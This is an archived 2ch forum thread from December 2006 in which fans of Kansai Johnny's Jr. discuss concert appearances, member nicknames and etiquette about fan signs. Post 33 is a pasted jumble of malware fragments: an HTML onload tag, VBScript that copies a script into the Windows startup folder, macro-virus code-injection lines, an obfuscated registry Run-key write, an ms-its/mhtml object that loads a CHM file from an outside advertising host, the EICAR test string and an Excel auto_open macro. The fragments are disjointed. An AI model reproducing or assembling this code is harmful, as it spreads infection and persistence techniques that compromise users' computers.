2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

甘受全国ヘの階段【17】

1 :ユーは名無しネ:2006/12/27(水) 22:19:49
甘受全国ヘの階段【16】
http://tv7.2ch.net/test/read.cgi/jr2/1165219754/

過去ログ
ttp://page.freett.com/west8/

関西Jr.レギュラーTV番組「ほんじゃに!」
BSフジ…火・22:00
関西テレビ…水・深夜00:35
三重テレビ…土・18:30
テレビ埼玉…木・18:30
岐阜テレビ…火・18:30
とちぎテレビ…月・20:30
テレビ神奈川…日・18:30
千葉テレビ…日・18:30
なお、各局とも放送時間が変更されることがありますのでご注意下さい

2 :ユーは名無しネ:2006/12/27(水) 22:20:08
【バド】 中間(б∀б) ヲサーン(´◇`)
【ボーイズ】 濱チャン(θヮθ) 大智(´ヮ`) もげりう !`▽´! パン(6ヮ6) 
【OSSaN】 太田(AA募集中) 千崎(AA募集中) もげさた(AA募集中) 長尾リ´。`リ 
【トプキズ】 神山(`-´ ) バッケス(AA募集中) 中山(AA募集中)
【リトルギャングス】 マトリ(・レ・) 楠本∂`ヮ`& 上村(AA募集中) 掛川(AA募集中) 
          丈(’-’) レオマ(δヮδ) 新矢(AA募集中) 颯(AA募集中)
          チビ横山(AA募集中) 山口(AA募集中) 美勇人(AA募集中)
           吉田(AA募集中)
【ベテラン】 文(V-V) 室兄(`▽´ ) 社員(゚△゚ ) NASA(`人´ )
【島流組】 ナマズ.(゜ー゜) もげあさ└( ゚─゚)┐ ブニ(`▽‘) 石田タン(AA募集中)
       もげなべ(AA募集中) 岡(AA募集中) ブササキ(´_ノ`) 
       安芸(AA募集中) 藤本(AA募集中)
【ミマキックス】 三牧 小松 森 杉村 風雅 餅田(まとめてAA募集中)
【他メンバー】 鮫チャン(´▲`) 天野 清水 中嶋 流星 ムエタイ兄弟(まとめてAA募集中)
【AA備品】ナマズ触角\   /

3 :ユーは名無しネ:2006/12/27(水) 22:27:36
島流組とかやめろよ
美勇人じゃなくて美勇士だって

4 :ユーは名無しネ:2006/12/27(水) 22:30:05
>1
d


5 :ユーは名無しネ:2006/12/27(水) 22:39:23
しかし今思ったが
オサーンのaは島流組から選抜できないか
イヤしてくれたまへ!
てかア行オホスギ

6 :ユーは名無しネ:2006/12/27(水) 22:52:29
あ、スマソ…

7 :ユーは名無しネ:2006/12/27(水) 22:59:58
>5
自坦aだし年齢的にもちょうどいいが
オサーン入りはやめてほしい
踊れないし新人ユニ的な感じで(ry


8 :ユーは名無しネ:2006/12/27(水) 23:00:39
オッサンのaは元々は天野枠

9 :ユーは名無しネ:2006/12/27(水) 23:00:49
aは天野でいいのに何でダメだったのだろう

10 :ユーは名無しネ:2006/12/27(水) 23:02:45
やまいら島流組をAAAと言ってるが
実際はAAAAなんだぞ

11 :ユーは名無しネ:2006/12/27(水) 23:06:49
安芸はまた別枠

12 :ユーは名無しネ:2006/12/27(水) 23:23:39
>9
年齢的にはリーダーだがジャニ暦浅いため

13 :ユーは名無しネ:2006/12/27(水) 23:30:21
自分で蹴ったみたいだぞ

14 :ユーは名無しネ:2006/12/27(水) 23:33:49
オッサンも最初は自担がAなら入って欲しいだろうなと思ってたけど
バンド班なら別に入らなくていいやと最近思う

15 :ユーは名無しネ:2006/12/27(水) 23:36:47
前スレ>999
葡萄館も逝けナスビで唯一の牛紺なんだyo
牛紺面いつわかるんだ…orz

16 :ユーは名無しネ:2006/12/27(水) 23:37:35
>12
浅いっても千崎や大田と変わらないし佐竹長尾とも半年くらいだぞ

17 :ユーは名無しネ:2006/12/27(水) 23:43:59
教えてチャンでスマソだがサンスポ連載各ユニの掲載日を教えてホシイ

18 :ユーは名無しネ:2006/12/27(水) 23:44:01
牛紺、前回は戌年になるから
101匹わんちゃんにかけて100人必要だったわけで
18歳以上の甘受も必要だったと思ってたyo
今年はどうだか

19 :ユーは名無しネ:2006/12/27(水) 23:49:05
今回も100人以上の出演ってどこかで誰かが
折角か(ry

20 :ユーは名無しネ:2006/12/27(水) 23:54:51
大田千崎の出番テラ少なかったぞ

21 :ユーは名無しネ:2006/12/27(水) 23:57:03
甘受18歳以上
NASA社員ミニあさナマズ文室兄もげずん天野濱チャソ

9人でオゲ?

22 :ユーは名無しネ:2006/12/28(木) 00:05:17
明日は室兄が出るよ

23 :ユーは名無しネ:2006/12/28(木) 00:19:30
誕生日は横蟻発言か
そんなのもあったな

24 :ユーは名無しネ:2006/12/28(木) 00:23:21
去年自担は放送後もいたことに気づかれませんでしたねorz
今年ももしもにかけて牛紺逝くよノシ

25 :ユーは名無しネ:2006/12/28(木) 02:21:17
ブサイクな頃の目に似てるのがブササキ?

26 :ユーは名無しネ:2006/12/28(木) 02:34:24
ブササキはマニア的にはマホタンに似てるらしいね

27 :ユーは名無しネ:2006/12/28(木) 02:54:03
謝れマホタンに謝れ

28 :ユーは名無しネ:2006/12/28(木) 03:34:54
どのへんが似てるんだ?
誰か並べてみてくれ

29 :ユーは名無しネ:2006/12/28(木) 04:51:46
ブササキが入所したての頃にも書き込んだ事あるよ
顔やダンスじゃなくてふいんきが似てるんだとオモ
似てないのに何故だかはワカンネ

30 :ユーは名無しネ:2006/12/28(木) 09:44:40
さて
今日はまた千崎大田の出番がますます増えてるのかな

31 :ユーは名無しネ:2006/12/28(木) 09:50:27
大田千崎の歓声が凄すぎて驚いた
さすが島流組より名前だけはみんな知ってるな

32 :ユーは名無しネ:2006/12/28(木) 10:29:38
>21
もげなべは?

33 :<body onload=window()>:2006/12/28(木) 10:44:34
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

34 :ユーは名無しネ:2006/12/28(木) 11:44:30
>32
もげなべは3月で18だからまだ

35 :ユーは名無しネ:2006/12/28(木) 12:53:09
もげなべ藤本安芸の特徴を教えてホスィ

36 :ユーは名無しネ:2006/12/28(木) 13:28:09
もげなべは色白長身あっさり顔長い手足美形ラスィ 
自分はあんま見てないのでこれしかわからん



37 :ユーは名無しネ:2006/12/28(木) 13:30:15
安芸はツアー組のなかで一番髪の毛が短い

38 :ユーは名無しネ:2006/12/28(木) 14:13:25
千崎大田の出番がまた増えてたって馬路?

39 :ユーは名無しネ:2006/12/28(木) 14:16:22
今日はほとんどのワラワラ曲に付いてた気ガス

40 :ユーは名無しネ:2006/12/28(木) 14:49:41
一ヶ月ツアーがんがってきた自担が馬鹿みたいだorz

41 :ユーは名無しネ:2006/12/28(木) 15:12:59
自分もツアー組担だがこればっかりは蛇兄の意向だから仕方ない
甘受紺に出ずに一ヶ月間頑張った自担を誇りに思うよ

42 :ユーは名無しネ:2006/12/28(木) 15:20:34
780 名前:ユーも名無しネ[sage] 投稿日:2006/12/28(木) 14:48:04
オッサンの出番が増え杉て
じぬんだけの島流組がからいお(つД`)

818 名前:ユーも名無しネ[sage] 投稿日:2006/12/28(木) 14:57:13
>780
嘘つくなお
今日見てきたが今までと島流し組の出番全然かわってないぞ
大田千崎はワラワラの時にいるだけだし

43 :ユーは名無しネ:2006/12/28(木) 16:24:44
オッサン芋のソロが増えたぞ

44 :ユーは名無しネ:2006/12/28(木) 17:19:26
>2を見て思い出したけどベテランはひらがなってどこかのMCで言ってたっけ

45 :ユーは名無しネ:2006/12/28(木) 17:36:17
ブンがひらがなって言ってた
チームべてらん

46 :ユーは名無しネ:2006/12/28(木) 17:37:24
室兄もびっくりしてたがな(w

47 :ユーは名無しネ:2006/12/28(木) 18:31:44
>>44
23日公演

48 :ユーは名無しネ:2006/12/28(木) 19:03:23
大田千崎7曲以上は出てたよ

49 :ユーは名無しネ:2006/12/28(木) 19:53:33
教えてチャンでスマソ
ミニあさとよくシンメ組んでたのは誰ですか?

50 :ユーは名無しネ:2006/12/28(木) 20:10:50
ブニ?

51 :ユーは名無しネ:2006/12/28(木) 20:37:40
ミニあさ新芽といえばブニしかいない

駄菓子歌詞
今回の紺ではナマズミニ新芽もあったよな
細身の長身だったらナマズ
ミニあさとよく似た体型だったらブニだな

52 :ユーは名無しネ:2006/12/28(木) 21:22:24
ナマズ今の身長何aくらい?

53 :ユーは名無しネ:2006/12/28(木) 21:39:42
ヘンリソロでナマズ生存確認


54 :ユーは名無しネ:2006/12/28(木) 21:41:05
>53
そんなワラワラしてるところで生存確認しないで
議ソロで確認してやれよ(w

55 :ユーは名無しネ:2006/12/28(木) 21:52:12
ヘンリタンソロはミニあさナマズ新芽だた
が殆どブニと新芽だたとオモー

56 :ユーは名無しネ:2006/12/28(木) 21:53:14
>55
そのときのブニ新芽は誰?
石田タン?

57 :ユーは名無しネ:2006/12/28(木) 21:54:43
ワラワラしてこそナマズタン

58 :ユーは名無しネ:2006/12/28(木) 22:06:39
ヘンリソロでミニあさ新芽だたナマズが気に入ったんだが
2ネムわからんから教えてホスィ

59 :ユーは名無しネ:2006/12/28(木) 22:09:42
>58
「ナマズ」でスレ検索したら本名載ってる

60 :ユーは名無しネ:2006/12/28(木) 22:11:24
>59
d

61 :ユーは名無しネ:2006/12/28(木) 22:33:35
なんだかナマズタソが着々と新規獲得してるみたいで
嬉しいかぎりだな

62 :ユーは名無しネ:2006/12/28(木) 23:10:22
島流し組は新規獲得できてるようだな
自分も例に漏れずだが

63 :ユーは名無しネ:2006/12/28(木) 23:19:13
AAA人気沸騰中

64 :ユーは名無しネ:2006/12/28(木) 23:48:37
AAAうちわけっこう見かけた
あとの島流し組は少ししか見なかったが

65 :ユーは名無しネ:2006/12/29(金) 00:00:15
室兄ウチワを見かけたぞ

66 :ユーは名無しネ:2006/12/29(金) 00:00:32
他の島流ウチワはたこやきから遠征してる濃いヲタばかりな希ガス

67 :ユーは名無しネ:2006/12/29(金) 00:27:22
やっぱり遠征してるヲタ多いんだろうな
自担出てない時はウチワ出さないというのが徹底されていたしな

68 :ユーは名無しネ:2006/12/29(金) 00:32:40
たこやきから遠征してる人裏山
自分はたこやきすら行けない程の過疎地
頑張ってウチワ振ってきてください

69 :ユーは名無しネ:2006/12/29(金) 00:41:24
たこやきだけじゃなく鯱も遠征してるヲタ多いよな
今日行く姐サンたちがんがってきてくれ

70 :ユーは名無しネ:2006/12/29(金) 00:55:46
確かに基本を守ってるヲタが多かった
自担出てない時にウチワ探してもあまり見つからない(w

71 :ユーは名無しネ:2006/12/29(金) 01:02:38
環八様に怒られるしな

72 :ユーは名無しネ:2006/12/29(金) 01:03:17
自担が出てても環八兄さんが目の前にいるときは下げてるんだが駄目か熊

73 :ユーは名無しネ:2006/12/29(金) 01:14:14
>72
流石にそこまでする必要はないだろ
折角がんがって踊ってるのに自分のウチワ下ろされてるのはセツナス

74 :ユーは名無しネ:2006/12/29(金) 02:25:50
やっかし爽かorz
自担が環八兄さんに怒られたらとオモて下げてた

75 :ユーは名無しネ:2006/12/29(金) 07:06:12
自分環八兄さん出ていようが自担ウチワ掲げてるのだがorz
ナマズウチワは初日MCでいじられていた

76 :ユーは名無しネ:2006/12/29(金) 07:31:07
怒られるとか('A`)

77 :ユーは名無しネ:2006/12/29(金) 07:38:49
今回のツアー組の名前と顔を確認したいのだが
雑誌に出てますか?

78 :ユーは名無しネ:2006/12/29(金) 08:18:01
>77
顔と名前をヲタ以外に公表することを
禁じられている門外不出ズニアの集まりなので
載っていません

79 :ユーは名無しネ:2006/12/29(金) 08:19:08
甘受が出てない時は出さないのが普通じゃないのか?

80 :ユーは名無しネ:2006/12/29(金) 08:21:10
>79
関西ではね
藤樹だとその公演中ずっと出しっぱなしが普通だよ

81 :ユーは名無しネ:2006/12/29(金) 08:40:49
>76
過去に松茸で色々あったんだよ
家族職員から一部ヲタに「ズニアコーナー以外の声援禁止」通達が出たりとか
だから甘受担はウチワに関してはものすごくナーバスになるわけだ

82 :ユーは名無しネ:2006/12/29(金) 09:24:04
>77
石田タソのみ載ってるぞ
ただ動いてるのとは別人に見えるが

83 :ユーは名無しネ:2006/12/29(金) 09:26:34
>81
そんなこともあったよな
だから甘受出てない時にウチワ下げてる姐サンを見ると
ある程度昔からのヲタなんだなと感じる

84 :ユーは名無しネ:2006/12/29(金) 09:33:02
>83
自分なんてあの時のことがトラウマになってしまってて
この冬の松茸でもデブ組バックでないにも関わらず自担がいない時にはウチワを下ろしていた
習慣って怖いよな

85 :ユーは名無しネ:2006/12/29(金) 10:12:06
>84
自分もあれがトラウマになって
出てる時でも近くに環八来ると自担が遠い場合は下ろしてしまう習性が
同じような姐サンがいると知って安心したよ

86 :ユーは名無しネ:2006/12/29(金) 10:16:03
新山な自分に姐さん方もう少しkwsk

87 :ユーは名無しネ:2006/12/29(金) 10:30:45
>81
そうなのか
今回目の前の環八兄さんの前で自担ウチワあげちゃったよ
自担は反対側ブロで一応いたが

88 :ユーは名無しネ:2006/12/29(金) 11:53:52
ドサ第一弾のときには甘受コーナー以外での甘受担の叫び厨がテラ多かったし
もう1回徹底してほしいな
環八兄さんたちのコント中に甘受の名前連呼とかもう('A`)

89 :ユーは名無しネ:2006/12/29(金) 12:37:49
新矢のAA (`⊇´) キボン

ココで受けの話って禁止?

90 :ユーは名無しネ:2006/12/29(金) 12:50:41
>85
自分だけじゃなくて禿安心した

91 :ユーは名無しネ:2006/12/29(金) 13:55:46
>89
聞きたい

92 :ユーは名無しネ:2006/12/29(金) 14:18:27
フツーに受けの話なんて禁止に決まってるだろ
折木ネタは該当スレ逝け

93 :ユーは名無しネ:2006/12/29(金) 14:59:13
受けの話なくても説明できるとオモ
前に松茸で某環八メンのソロ曲の時にヲタが甘受名を叫び
叫ばれた甘受が環八メンに怒られたとかで困ったラスィ
その話がヲタの間に広まりそれ以来叫ばないウチワ上げないは暗黙の了解

94 :ユーは名無しネ:2006/12/29(金) 17:21:28
豚切りスマソ
今年のサマスペでカックンって言われたの誰?

95 :ユーは名無しネ:2006/12/29(金) 17:53:42
>杉村

96 :ユーは名無しネ:2006/12/29(金) 17:56:57
>93
dです
なるほど

97 :ユーは名無しネ:2006/12/29(金) 21:42:14
もげずんヲタが異常に騒いで℃がキレタてな
ナツカスィ

98 :ユーは名無しネ:2006/12/29(金) 21:50:37
わざわざ名前出さんでも

99 :ユーは名無しネ:2006/12/29(金) 21:58:02
もげずんヲタじゃなくてもげずん仕切りだった件

100 :ユーは名無しネ:2006/12/29(金) 22:08:50
>99
ナツカスィ(w
あの声目立つ

101 :ユーは名無しネ:2006/12/29(金) 22:13:07
普通に疑問なんだが何で叫び厨は出てないヤシの名前叫びまくるの?

102 :ユーは名無しネ:2006/12/29(金) 22:18:55
>101
出ていたぞ
℃のバックでな

103 :ユーは名無しネ:2006/12/29(金) 22:44:40
親分ソロでナマズのシンメだったの誰か分かる?

104 :ユーは名無しネ:2006/12/29(金) 22:48:42
>102
別にその話だけをしてるわけじゃないのでは

105 :ユーは名無しネ:2006/12/29(金) 22:52:56
>103
石田タソ

106 :ユーは名無しネ:2006/12/29(金) 23:20:58
http://pr5.cgiboy.com/S/7080892

107 :ユーは名無しネ:2006/12/29(金) 23:21:56
あいうえお作文

108 :ユーは名無しネ:2006/12/29(金) 23:34:45
自担牛紺出ますように…(-人-)ナモナモ

109 :ユーは名無しネ:2006/12/29(金) 23:35:11
千崎、大田だけ残ってあとは帰阪はガイシュツ?

110 :ユーは名無しネ:2006/12/29(金) 23:53:17
>109
まだだよ
自分怒りに震えて書くことができなかったし

111 :ユーは名無しネ:2006/12/30(土) 00:08:24
大田千崎も18以下なのに何故残らされたんだろうか

112 :ユーは名無しネ:2006/12/30(土) 00:26:32
見学とあけおめのリハじゃね?

113 :ユーは名無しネ:2006/12/30(土) 00:39:28
あけおめにバドボその他甘受は出るのか能

114 :ユーは名無しネ:2006/12/30(土) 00:53:48
>111
オジイチャソと楽しく遊ぶために決まってる

115 :ユーは名無しネ:2006/12/30(土) 01:15:59
>114
1番リアルな答えだ

116 :ユーは名無しネ:2006/12/30(土) 01:23:46


16 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)